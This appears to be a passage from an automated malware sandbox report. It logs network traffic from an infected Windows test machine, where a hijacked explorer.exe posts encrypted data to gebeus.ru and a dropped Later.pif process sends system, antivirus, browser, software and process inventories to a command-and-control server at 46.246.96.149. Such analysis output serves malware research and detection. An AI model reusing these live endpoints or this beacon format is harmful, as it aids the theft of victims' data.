                                      Jul 15, 2024 06:12:32.362530947 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:12:32 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.54973258.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:12:43.007643938 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ewsnnfxrccp.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 163
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:12:43.007667065 CEST163OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 0b fd b7
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu:J#v]~g.iFd_Z-+3,,H$HL33
                                      Jul 15, 2024 06:12:44.551074982 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:12:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.54973358.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:12:49.310848951 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://aeqbmojsaplkjy.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 329
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:12:49.310873985 CEST329OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 38 fa aa
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu$8j"mfgWy*=O2ci+7+=8CKb_HI%i?-wVZ|'e\*t@q{p1Zai>P0
                                      Jul 15, 2024 06:12:50.818428993 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:12:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.54973458.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:12:55.499866962 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qhngbjsxhdjts.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 163
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:12:55.499907970 CEST163OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 1d c3 e7
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu;sEfBd%8O.;y;U@HDR[?A8'7$JKM$j
                                      Jul 15, 2024 06:12:56.949840069 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:12:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.549735186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:06.584767103 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vahxvallvgf.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 251
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:06.584815979 CEST251OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 52 af e5
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuKRDORrO%!WPI66oiq/jSLA)$Jh75L%ic[k<tCOB9e5hHE,R}0+;7;
                                      Jul 15, 2024 06:13:07.645116091 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.54973646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:09.391093016 CEST177OUTPOST /connect HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 61
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 76 65 72 73 69 6f 6e 3d 74 65 73 74
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&version=test
                                      Jul 15, 2024 06:13:10.199902058 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:10 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=21bhg9uvofeeuc4v85rp4ieffc; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.549737186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:12.333853006 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://evdyuckmovmlgw.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 253
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:12.333868027 CEST253OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1a d1 f7
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuR)}Jy9FL45-q*%6FjK1%dNF$AasNcY-hHV$7mf!M27NO)v|{XsYL
                                      Jul 15, 2024 06:13:13.393059969 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.54973846.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:12.388534069 CEST432OUTPOST /osinfo HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 316
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6f 73 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 2d 62 69 74 26 6c 61 6e 67 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 26 6c 61 6e 67 73 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 26 6e 61 6d 65 3d 68 61 72 64 7a 26 61 64 6d 69 6e 3d 46 61 6c 73 65 26 63 70 75 3d 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 34 20 43 6f 72 65 73 26 73 69 7a 65 78 3d 31 32 38 30 26 73 69 7a 65 79 3d 31 30 32 34 26 72 61 6d 3d 34 32 39 33 39 37 31 39 36 38 26 76 69 64 65 6f 3d 55 45 58 38 37 20 7c 20 52 41 4d 3a 20 31 30 37 33 37 34 31 38 32 34 0d 0a
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&os=Microsoft Windows 10 Pro 64-bit&lang=English (United Kingdom)&langs=English (United Kingdom); English (United Kingdom); &name=hardz&admin=False&cpu=Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 4 Cores&sizex=1280&sizey=1024&ram=4293971968&video=UEX87 | RAM: 1073741824
                                      Jul 15, 2024 06:13:13.112035036 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:13 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=3t96v9qi1m86cvr2bskg2o685d; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.54973946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:13.348712921 CEST190OUTPOST /defenders HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 72
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Windows Defender
                                      Jul 15, 2024 06:13:14.045598030 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:13 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=8v75nbprvlk54oh98gsoan7rhr; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.54974046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:14.066075087 CEST329OUTPOST /browsers HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 211
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 7c 20 76 65 72 2e 20 31 31 38 2e 30 2e 31 2e 38 36 37 30 3b 0d 0a 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 3b 0d 0a 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 7c 20 76 65 72 2e 20 31 31 2e 30 2e 31 39 30 34 31 2e 31 35 36 36 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 3b 0d 0a
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Mozilla Firefox | ver. 118.0.1.8670;Google Chrome | ver. 117.0.5938.132;Internet Explorer | ver. 11.0.19041.1566;Microsoft Edge | ver. 117.0.2045.47;
                                      Jul 15, 2024 06:13:14.759726048 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:14 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=kmg0m9qeag3sj77he9aaq9hg53; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.54974146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:14.779076099 CEST422OUTPOST /softwares HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 303
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 55 70 64 61 74 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 57 65 62 56 69 65 77 32 20 52 75 6e 74 69 6d 65 3b 0d 0a 4a 61 76 61 20 41 75 74 6f 20 55 70 64 61 74 65 72 3b 0d 0a 4a 61 76 61 20 38 20 55 70 64 61 74 65 20 33 38 31 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 32 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 34 2e 33 36 2e 33 32 35 33 32 3b 0d 0a 4f 66 66 69 63 65 20 31 36 20 43 6c 69 63 6b 2d 74 6f 2d 52 75 6e 20 45 78 74 65 6e 73 69 62 69 6c 69 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 3b 0d 0a
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Google Chrome;Microsoft Edge;Microsoft Edge Update;Microsoft Edge WebView2 Runtime;Java Auto Updater;Java 8 Update 381;Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532;Office 16 Click-to-Run Extensibility Component;
                                      Jul 15, 2024 06:13:15.497977972 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:15 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=93prlsesgtg62st7u965f5uiok; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.549742186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:17.760041952 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://yxdvfnljluug.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 253
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:17.760086060 CEST253OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 42 b1 9d
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuxBxAatr23d=lvMvjZ|911y ,(J<>f`F)Xl$*OY9di7giSbG=z2+
                                      Jul 15, 2024 06:13:19.037774086 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:18 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.54974346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:23.074628115 CEST12360OUTPOST /proccesses HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 24746
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 70 72 6f 63 65 73 73 65 73 3d 49 44 3a 20 30 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 2c 20 4e 61 6d 65 3a 20 52 65 67 69 73 74 72 79 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 33 33 32 2c 20 4e 61 6d 65 3a 20 73 6d 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 32 30 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 39 36 2c 20 4e 61 6d 65 3a 20 77 69 6e 69 6e 69 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>processes=ID: 0, Name: System Idle Process, CommandLine: NULLID: 4, Name: System, CommandLine: NULLID: 92, Name: Registry, CommandLine: NULLID: 332, Name: smss.exe, CommandLine: NULLID: 420, Name: csrss.exe, CommandLine: NULLID: 496, Name: wininit.exe, CommandLine: NULLID: 504, Name: csrss.exe, CommandLine: NULLID: 564, Name: winlogon.exe, CommandLine: NULLID: 632, Name: services.exe, CommandLine: NULLID: 640, Name: lsass.exe, CommandLine: NULLID: 752, Name: svchost.exe, CommandLine: NULLID: 780, Name: fontdrvhost.exe, CommandLine: NULLID: 788, Name: fontdrvhost.exe, CommandLine: NULLID: 872, Name: svchost.exe, CommandLine: NULLID: 924, Name: svchost.exe, CommandLine: NULLID: 992, Name: dwm.exe, CommandLine: NULLID: 444, Name: svchost.exe, CommandLine: NULLID: 732, Name: svchost.exe, CommandLine: NULLID: 280, Name: svchost.exe, CommandLine: NULLID: 1032, Name: svchost.exe, CommandLine: NULLID: 1056, Na [TRUNCATED]
                                      Jul 15, 2024 06:13:23.079749107 CEST4944OUTData Raw: 52 45 79 5a 59 62 52 70 6a 43 7a 4c 6d 74 55 74 71 72 6c 76 4c 4c 4b 73 76 5c 51 65 59 5a 48 70 55 52 58 79 4c 4b 75 42 43 57 5a 58 51 2e 65 78 65 22 20 0d 0a 49 44 3a 20 33 31 36 30 2c 20 4e 61 6d 65 3a 20 51 65 59 5a 48 70 55 52 58 79 4c 4b 75
                                      Data Ascii: REyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 3160, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 2
                                      Jul 15, 2024 06:13:23.079772949 CEST4944OUTData Raw: 54 73 64 6b 58 76 69 69 43 7a 51 65 6d 69 62 7a 47 5a 6f 71 66 53 65 47 56 41 47 41 50 71 70 4c 55 79 44 44 6c 61 44 59 69 4f 78 45 4e 6b 67 67 67 79 52 45 79 5a 59 62 52 70 6a 43 7a 4c 6d 74 55 74 71 72 6c 76 4c 4c 4b 73 76 5c 51 65 59 5a 48 70
                                      Data Ascii: TsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 6300, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRp
                                      Jul 15, 2024 06:13:23.079874039 CEST2472OUTData Raw: 5a 58 51 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 68 69 72 58 54 73 64 6b 58 76 69 69 43 7a 51 65 6d 69 62 7a 47 5a 6f 71 66 53 65 47 56 41 47 41 50 71 70 4c
                                      Data Ascii: ZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 1852, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXvii
                                      Jul 15, 2024 06:13:23.079952955 CEST139OUTData Raw: 20 36 35 38 34 2c 20 4e 61 6d 65 3a 20 4c 61 74 65 72 2e 70 69 66 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 37 38 38 30 31 5c 4c 61 74 65
                                      Data Ascii: 6584, Name: Later.pif, CommandLine: C:\Users\user\AppData\Local\Temp\78801\Later.pif ID: 4672, Name: WmiPrvSE.exe, CommandLine: NULL
                                      Jul 15, 2024 06:13:23.905800104 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:23 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=ugosbomq8nu73aumse22g22hvk; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.549744186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:23.556608915 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://hocvueqllial.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 126
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:23.556642056 CEST126OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 4b d1 a4
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu7K{f93]6Yw3!S
                                      Jul 15, 2024 06:13:24.612420082 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:24 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.54974546.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:24.007376909 CEST124OUTPOST /getpu HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 10
